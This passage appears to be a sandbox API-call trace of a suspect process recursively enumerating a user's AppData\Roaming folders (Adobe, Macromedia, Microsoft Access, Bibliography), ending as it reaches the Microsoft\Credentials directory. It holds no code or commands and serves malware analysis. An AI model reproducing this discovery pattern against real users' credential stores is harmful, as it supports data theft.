FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.603] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.603] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.603] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="Dictionaries" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries" [0083.603] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*" [0083.603] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.603] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.603] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.603] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.603] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.603] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.603] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.603] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="LogTransport2" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2" [0083.603] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*" [0083.603] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.603] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.603] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.603] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.603] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0 [0083.603] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.603] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.603] PathMatchSpecW (pszFile="BDa5B4GVrREPMxye24.gif", pszSpec="*") returned 1 [0083.603] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.603] PathMatchSpecW (pszFile="bGn 5cfhGh1UZr.wav", pszSpec="*") returned 1 [0083.603] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.603] PathMatchSpecW (pszFile="cL5q.m4a", pszSpec="*") returned 1 [0083.603] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.603] PathMatchSpecW (pszFile="Cq3qmzP.mp4", pszSpec="*") returned 1 [0083.603] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.604] PathMatchSpecW (pszFile="fVg-V.m4a", pszSpec="*") returned 1 [0083.604] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.604] PathMatchSpecW (pszFile="fyH-uEyk.gif", pszSpec="*") returned 1 [0083.604] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.604] PathMatchSpecW (pszFile="gXiF8Ie492m0IXBb.gif", pszSpec="*") returned 1 [0083.604] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.604] PathMatchSpecW (pszFile="h4yUoS3CBTrCBZSc.mp4", pszSpec="*") returned 1 [0083.604] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.604] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Identities" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities" [0083.604] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*" [0083.604] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.604] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.604] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.604] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="{31810C36-5D23-4CCE-A3B4-316DED195C38}" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}" [0083.604] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*" [0083.604] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.604] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.604] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.604] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.604] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0 [0083.604] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.604] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.604] PathMatchSpecW (pszFile="iuoldw.exe", pszSpec="*") returned 1 [0083.604] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.604] PathMatchSpecW (pszFile="jzyu_DZ Ndc.odt", pszSpec="*") returned 1 [0083.604] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.604] PathMatchSpecW (pszFile="KRCwaFRvShw3yRI.swf", pszSpec="*") returned 1 [0083.604] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.604] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia" [0083.604] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*" [0083.604] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.604] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.604] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.604] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player" [0083.604] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*" [0083.604] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.604] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.604] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.605] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="macromedia.com" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0083.605] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*" [0083.605] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.605] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.605] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.605] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="support" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0083.605] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*" [0083.605] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.605] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.605] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.605] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="flashplayer" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0083.605] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*" [0083.605] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.605] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.605] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.605] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="sys" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0083.605] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*" [0083.605] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.605] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 1 [0083.605] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 1 [0083.605] PathMatchSpecW (pszFile="Microsoft OneDrive.rig", pszSpec="*") returned 1 [0083.605] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 1 [0083.605] PathMatchSpecW (pszFile="rO4p00rRfog3ie0eV3.ecv", pszSpec="*") returned 1 [0083.605] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 1 [0083.605] PathMatchSpecW (pszFile="settings.sol", pszSpec="*") returned 1 [0083.605] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 1 [0083.605] PathMatchSpecW (pszFile="SJpF7mOw3gFdA.hin", pszSpec="*") returned 1 [0083.605] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0 [0083.605] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.605] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.605] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.605] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.605] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.606] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.606] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.606] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.606] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.606] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0 [0083.606] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.606] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.606] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft" [0083.606] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\*" [0083.606] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.606] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.606] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.606] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Access" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access" [0083.606] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access\\*" [0083.606] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.606] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.606] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.606] PathMatchSpecW (pszFile="AccessCache.accdb", pszSpec="*") returned 1 [0083.606] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.606] PathMatchSpecW (pszFile="AccessCache.laccdb", pszSpec="*") returned 1 [0083.606] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.606] PathMatchSpecW (pszFile="System.mdw", pszSpec="*") returned 1 [0083.606] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.606] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.606] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.606] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="AddIns" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns" [0083.606] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns\\*" [0083.606] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.606] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.606] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.606] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.606] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.607] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Bibliography" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography" [0083.607] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\*" [0083.607] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.607] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.607] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.607] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography", pszFile="Style" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" [0083.607] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*" [0083.607] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.607] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.607] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.607] PathMatchSpecW (pszFile="APASixthEditionOfficeOnline.xsl", pszSpec="*") returned 1 [0083.607] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.607] PathMatchSpecW (pszFile="CHICAGO.XSL", pszSpec="*") returned 1 [0083.607] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.607] PathMatchSpecW (pszFile="GB.XSL", pszSpec="*") returned 1 [0083.607] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.607] PathMatchSpecW (pszFile="GostName.XSL", pszSpec="*") returned 1 [0083.607] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.607] PathMatchSpecW (pszFile="GostTitle.XSL", pszSpec="*") returned 1 [0083.607] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.607] PathMatchSpecW (pszFile="HarvardAnglia2008OfficeOnline.xsl", pszSpec="*") returned 1 [0083.607] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.607] PathMatchSpecW (pszFile="IEEE2006OfficeOnline.xsl", pszSpec="*") returned 1 [0083.607] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.607] PathMatchSpecW (pszFile="ISO690.XSL", pszSpec="*") returned 1 [0083.607] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.608] PathMatchSpecW (pszFile="ISO690Nmerical.XSL", pszSpec="*") returned 1 [0083.608] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.608] PathMatchSpecW (pszFile="MLASeventhEditionOfficeOnline.xsl", pszSpec="*") returned 1 [0083.608] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.608] PathMatchSpecW (pszFile="SIST02.XSL", pszSpec="*") returned 1 [0083.608] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.608] PathMatchSpecW (pszFile="TURABIAN.XSL", pszSpec="*") returned 1 [0083.608] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.608] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.608] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.608] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.608] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.608] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Credentials" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials" [0083.608] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials\\*") 